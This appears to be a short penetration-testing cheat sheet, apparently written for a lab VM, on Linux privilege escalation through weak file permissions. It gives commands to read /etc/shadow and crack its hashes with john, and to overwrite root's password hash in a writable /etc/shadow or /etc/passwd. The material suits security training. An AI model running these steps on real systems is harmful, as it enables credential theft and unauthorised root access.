Weak File Permissions
The name itself tells everything, weak file permissions on sesitive files.
Readable /etc/shadow
ls -l /etc/shadow
View the contents
cat /etc/shadow
Copy the hash from the file and crack the password using any password-cracking tool.
john --wordlist=/usr/share/wordlists/rockou.txt has.txt
Then use the cracked password to gain access.
Writable /etc/shadow
Note that the /etc/shadow file on the VM is world-writable:
ls -l /etc/shadow
If they are writable then generate a new password hash with the password of your choice
mkpasswd -m sha-512 password1234
Edit the /etc/shadow file and replace the original root user's password hash with the new password that you generated.
Writable /etc/passwd
Historically the /etc/passwd file contained user password hashes and some versions of Linux will still allow password hashes to be stored there.
Step 1: Check Permissions
ls -l /etc/passwd
Step 2: Generate a new password
openssl passwd password1234
Step 3: Edit the /etc/passwd file and place the generated password hash between the first and second colon(:) of the root user's row.
Last updated